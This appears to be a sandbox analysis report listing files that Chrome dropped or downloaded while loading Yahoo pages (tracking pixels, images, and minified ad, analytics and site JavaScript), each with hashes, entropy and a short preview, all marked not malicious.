                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........L.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):88659
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.376886315450943
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:/OOLe6LIozqg76MmhSDTHUgO/fNl03RElUWw+RbtKDEMc:06pzZ6MQcilCRElUyRbtKDE7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:CB03350D0C32631BB2F75A6C7B4164C0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6F02439778F69F4708C536DF330CBD662DA8BD9E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:464967B10A3ED261A39CD6C8EB252AE90A41B68B8EA9074656F0F0906CEDB91B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:25FA5576B14AEF6EE9E7D0AAAE9573A22AD548CF6B8DA339E58D8D7F87EE1DEE88511520976B5DCC4691919CD8F66C282BB303A7E0CE364EFC946A263E667B9E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(){"use strict";const e="undefined"!=typeof window?window:{assertive:{},benji:{},googletag:{cmd:[]},pbjs:{que:[]},YAHOO:{}};Promise.allSettled=Promise.allSettled||(e=>Promise.all(e.map((e=>e.then((e=>({status:"fulfilled",value:e}))).catch((e=>({reason:e,status:"rejected"})))))));const t=["localhost","aol.com","aol.co.uk","aol.de","autoblog.com","cricket.yahoo.sportz.io","engadget.com","yahoo.com","yahoo.com.hk","yahoo.com.tw"].map((e=>`([\\.\\w\\-]+\\.)?${e.replace(/\./g,"\\.")}`)),n=["cricket.yahoo.net"].map((e=>e.replace(/\./g,"\\."))),i=new RegExp(`^https?://(${t.concat(n).join("|")})(:\\d+)?$`);const s="initialize",o="initialize_ack",r="initialize_i13n",a="intersect",c="render",d="resize_ad",l="start_ads",h="tab_focus",u="block",g="index",p=!0,f="DOMContentLoaded",m="0",b="testid",y="ncid",_="fr",E="pg_name",v="type",I="benji-premium-ad",S="auto",A="VERSION",C={ATS_DIRECT:"_lr_atsDirect"};var T,w;!function(e){e.DynamicAllocation="Dynamic Allocation",e.DirectSold="Direct So
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.5257351171929923
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUEIHh/:i4/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:13E1C7A2184E36D7AE519E99B1AA226F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:355CCAD4EAC39838E1CC76FD0B670FD2EA1E5AA3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:48A33CA9F42B91902D57AD8AC52E1CE32B92C8C10C732F2DBB6FE960EBFD9438
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B1A6CFA7B21DBB0B281D241AF609F3BA7F3A63E5668095BBA912BF7CFD7F0320BAF7C3B0BFABD0F8609448F39902BAEB145BA7A2D8177FE22A6FCEA03DD29BE1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 144 x 144, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):5774
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.943553143014523
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:AyMOZRQaUhyyPeV73Ww8r4ofSivR5UFoh+XIw31xEwZIaVyr1tkIk:cOZRehtep34r4o5vR5UFNl1xrZFyhed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:3A37F3D24FE68E35C1F239537FABAC9D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2EF6B79EA0C20CEE9899A0052AB54B1A19D6D1BC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:9D8AB0C55EA5657FB367CF598918A9461DE8DC7462710B17AC448E6CCF3A8984
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6A4CF5351D400E92DB46FD5E58E474F058B428ABE46901B13D55FE8ABCC3869810943F4F669C5305AD34A894D2957D4E0F111F186B240B0C4B09836AB99FBF1E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR..............F.....gAMA......a....EIDATx..]{xU..!.$@.I....<.AyT.@...O.B..."......Tf(3R;...1E..qt....X,....bA(...B..^!.!....N...}.=..s.s..[9..X{..Y{..=..iF...Yhr?.@...X.....-j..Y....sEFF.....e.rK...h_)x,.F. 0............=.....U..)I). ...zi...<.<...XP.#".....k......S...@.........I.......'.uJJ..4m.|Z.i.......8.-.......&[#..@.N..<....g.);..G.|1x!.t(D.y....p....?..,*......y........3......a+....r...iG.6<!......^......\+Q.l.i[...Y]B...)..s.O.....,Z.E...H.B%......C9......U..*.=.......6..@...(a.xt...d.o..O.D..)w...'.........>.....!u.~vwr.....=!.;`.S).^..P.C.F.%.bn....h!...<.u5u.C.{.:()f.B... .....dSI...u..uL]..5..1..."...<&rQU.04..i...v&.<.%..@.O.H.....E....A....xY....x.Cx..N...k.N5A...=...N39;P...B.K.o.."t..Rx. .<....siBQ|5.>X....>..r.9f3.....r....g..<W...JZ.\7.Te...z.t.@.e.W.5..<t...a.......X.. ..S..`.0{......(.(.)~.N4.. .........}..wQU... ..eF.U.0.n.Kf.....#. *............;.a......rU........*...........:.....-.jU=..'^...i(@..~..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (11901), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):11901
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.106396238513521
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:ggHWnmGW7GECHay2/WINSyAWRvrhAo1ti:ggHWnmGW7GECHaXN9AWR8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:59AE89307F6BE51355E07ACF3994F79B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A9C5474C652DBC6B60B97C6E723E03A399ACA92D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F54AFF9F498AEFB3479AF7D4F67B5ECE9465B24DB28293A1EE7F32A2230E162F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:ED56A2963D8ACCC7E316F10138566AA2BA715384418B106997C6525D016BE61C6B7583227DBDFC28704A71248DC8E21CC0E19E8D77D46FF84A3D143FE471FD63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(a,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define("wafer-loader",[],e):"object"==typeof exports?exports["wafer-loader"]=e():(a.wafer=a.wafer||{},a.wafer.wafers=a.wafer.wafers||{},a.wafer.wafers["wafer-loader"]=e())}("undefined"!=typeof self?self:this,function(){return function(a){function e(w){if(r[w])return r[w].exports;var f=r[w]={i:w,l:!1,exports:{}};return a[w].call(f.exports,f,f.exports,e),f.l=!0,f.exports}var r={};return e.m=a,e.c=r,e.d=function(a,r,w){e.o(a,r)||Object.defineProperty(a,r,{configurable:!1,enumerable:!0,get:w})},e.n=function(a){var r=a&&a.__esModule?function(){return a.default}:function(){return a};return e.d(r,"a",r),r},e.o=function(a,e){return Object.prototype.hasOwnProperty.call(a,e)},e.p="https://s.yimg.com/aaq/wf/",e(e.s="./src/entry.js")}({"../../manifest.json":function(a,e){a.exports={"wafer-account-switch":{meta:{version:"1.1.7"},modern:{min:"/aaq/wf/wf-account-switch-1.1.7-moder
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):83455
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.46865625726414
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:ZFfIMuTGmAwogHWRqBm+SUb0EZugaj8V/MbMfQvVt9a+rGFxZpoArxlPgOuk4kNs:ZdvoG3cBm+SVCNTV/MelrxlPhSFcLtwJ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:29675EC6A09583AB5C9CAC1376B922BB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:99451B188A3B430F920FB20463435E30EF7F9284
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:72EA204ED99417C7BD16B60C5F782FD214C2967ADF7E17C715C64E247782968A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:20AC6705F0AA73486F494DE08D65FEF4AC5388D5CCD91B693555A222F1DE53685ED9449867F6CD628FE76808AA2FBBE8864C010985A3E9216C8E03A16A183745
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/uc/finance/srchjs/1.1.97/js/finSearch.modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(){"use strict";var e=this&&this.__assign||function(){return e=Object.assign||function(e){for(var t,s=1,o=arguments.length;s<o;s++)for(var n in t=arguments[s])Object.prototype.hasOwnProperty.call(t,n)&&(e[n]=t[n]);return e},e.apply(this,arguments)},t=1e3,s=60,o=60*s,n=24*o,i=7*n;var r={second:45,minute:45,hour:22,day:5};const l=1500,a=["https://query1.finance.yahoo.com","https://query2.finance.yahoo.com"],c={SEARCH:"/v1/finance/search",TRENDING:"/v1/finance/trending"},d="https://finance.yahoo.com",u="finSearchAutocomplete",h="nav",m="quotes",p="screenerFieldResults",g="lists",_="news",f="recommend",v="researchReports",b="finSearchContext",C="fin-search",y={ALL:"all",RESEARCH_REPORTS:"researchReports",QUOTE:"quote",HOLDERS:"instituationalHolders"},x={[m]:{title:"SYMBOLS"},[_]:{title:"NEWS"},[g]:{title:"LISTS"},[v]:{title:"RELATED_RESEARCH"},[f]:{title:"TRENDING"},[p]:{title:"HOLDERS"}},w={[y.ALL]:[h,m,_,g],[y.RESEARCH_REPORTS]:[h,m,_,v,g],[y.QUOTE]:[m],[y.HOLDERS]:[p]},L={[y.AL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (33589), with LF, NEL line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):58753
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.26167812703519
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:y5B9KXqe7mdOgKY0hXpXVG8FoAKRXSdRKftld0VTScQI8rdFj8:EB9K6d8gghXnyXSuVld4z8Z6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A9C11221224C7869C6B916618D892612
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:39C436EE6D2AFD6F851840AB4673C56CE0372D3E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:7B48A74FA0F94D83AE6D60C772F5E7AA66E7BE1B63CCF223CA14E34D3D7B0D22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:EA05BD1555D819AA35985D16EDA15F9A3805DA01F192156157739E30CE2A22D2888F8E4D1A2ED7A3FC2739CEF848B7EE882A5A628B3657E27AF979FE8F0EB09D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:try{ window.__mNPubCidCB = window.advBidxc.mnetCoRtusId ;/*. * This Source Code Form is subject to the terms of the Mozilla Public. * License, v. 2.0. If a copy of the MPL was not distributed with this file,. * You can obtain one at https://github.com/conversant/pubcid.js/blob/master/LICENSE. * Original github code https://github.com/conversant/pubcid.js. */.!function(t){var e={};function n(r){if(e[r])return e[r].exports;var o=e[r]={i:r,l:!1,exports:{}};return t[r].call(o.exports,o,o.exports,n),o.l=!0,o.exports}n.m=t,n.c=e,n.d=function(t,e,r){n.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:r})},n.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},n.t=function(t,e){if(1&e&&(t=n(t)),8&e)return t;if(4&e&&"object"==typeof t&&t&&t.__esModule)return t;var r=Object.create(null);if(n.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:t}),2&e&&"s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://cm.g.doubleclick.net/pixel?google_nid=zemanta&google_push=AXcoOmQa06r_UGYZjE4uuqmPbPm7zbm8b0O7_H4XvaUq2Mt54qnZEjFXK-kXeRpCZSqjQ9gWiouiGrEApJ4AZhvRBbN469GiLRH2&google_hm=R2k1UmxiWnFvM3A3ZDZsTkZCWTg=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):152004
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.464929062207595
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3072:N5T3YK06DQWzOAgMTivhTt9kPyzpnsH+Nm5v5:LT3YK0WzOKWv94KdnA+m5v5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:1851E0328DB85FEA057B73B59CD718F0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:BFB526478D292EDF6AB10985BB354DDFE67DCD7C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:43B83FEC9342E0E8BB67E6AC615CA6BB60F802F012514215F41FE4663F6CD189
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:28CF01910F77F0692D3C363633567F466DFC14669F3B32C684BD008EB76CC6DA2B49F01976A4B901DE3B5C4B66456F359630C288F214B7EA67FE1AF60CC7D771
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:var zn=Object.defineProperty;var qn=(n,t,e)=>t in n?zn(n,t,{enumerable:!0,configurable:!0,writable:!0,value:e}):n[t]=e;var d=(n,t,e)=>(qn(n,typeof t!="symbol"?t+"":t,e),e),Xn=(n,t,e)=>{if(!t.has(n))throw TypeError("Cannot "+e)};var fe=(n,t,e)=>{if(t.has(n))throw TypeError("Cannot add the same private member more than once");t instanceof WeakSet?t.add(n):t.set(n,e)};var w=(n,t,e)=>(Xn(n,t,"access private method"),e);import{E as Tt}from"./scheduler.Dr9AAxFe.js";import{g as yt}from"./stores.DPDRpTFd.js";import{b as Jn,w as Er}from"./43.CtYdpA_T.js";const _r=(()=>{try{return window.localStorage.setItem("test","test"),window.localStorage.removeItem("test"),!0}catch{return!1}})(),Qn=(n,t)=>{if(!n||!t)return!1;const e=/^\/($|community)/;return e.test(n)&&e.test(t)},bt={DESKTOP:"desktop",TABLET:"tablet",SMARTPHONE:"smartphone"};class Tr{constructor(t){d(this,"innerState");d(this,"innerStore");this.innerState=this.getInitialState(),this.innerStore=t(this.innerState,this.startStopNotifier),this.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (8787), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):8787
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.18863330580164
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:/ZtSSViMOpQGb9yjWipq4Z8Yib8Py50D3X2neFaY5E6ZYrlfxBMn:/rs4Q9egLey5uAHjrlfIn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:446C3635A0812F8C988A5E9CA3FC96A2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:0EFCF277E84D7433A893A01D66CF753705A5F1A8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:5F0321E77CA2276D46ACBECA4AFDE142BDD748A373B43F89D3740DEC8AFF091D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:8597616D6CEB0607556F4F80279E93D727863DFD7BB53EDAE03DAD9C781A17B8D81E518D9403031B97F68BCC835A7E70F7601237391C1ED803ABEF4C55B6D992
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define("wafer-sticky",[],e):"object"==typeof exports?exports["wafer-sticky"]=e():(t.wafer=t.wafer||{},t.wafer.wafers=t.wafer.wafers||{},t.wafer.wafers["wafer-sticky"]=e())}("undefined"!=typeof self?self:this,function(){return function(t){function e(i){if(o[i])return o[i].exports;var r=o[i]={i:i,l:!1,exports:{}};return t[i].call(r.exports,r,r.exports,e),r.l=!0,r.exports}var o={};return e.m=t,e.c=o,e.d=function(t,o,i){e.o(t,o)||Object.defineProperty(t,o,{configurable:!1,enumerable:!0,get:i})},e.n=function(t){var o=t&&t.__esModule?function(){return t.default}:function(){return t};return e.d(o,"a",o),o},e.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},e.p="https://s.yimg.com/aaq/wf/",e(e.s="./src/entry.js")}({"./src/entry.js":function(t,e,o){"use strict";function i(t){if(Array.isArray(t)){for(var e=0,o=Array(t.length);e<t.length;e++)o[e]=t[e];return o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):48316
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.6346993394709
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 356x180, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):19862
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.960196714337617
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:gGdh8PNgpmT+xViwBLgkd/wC75pPFWVsws7ZoQPgBhk:fh8PNgm+xVi0gkd/wC75hFWGwsmhk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B371A85685B21BB47FDF8311CA0D94AA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:04FA5D84E61C20C911225A611B3E0D6E4402CD81
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E98DC71F75664D420C0E99A6C071156F165B73C014352754D01478649E353C5B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:8D4CFA26AEDC24A9708677BCBE2495FAAF4639FE54F961D6A583119F5E5B2F5937A2BE8DFA6DE4A920F909BD9F30295A364545246BBA67E4BC1DD7DB1E2CD2B2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
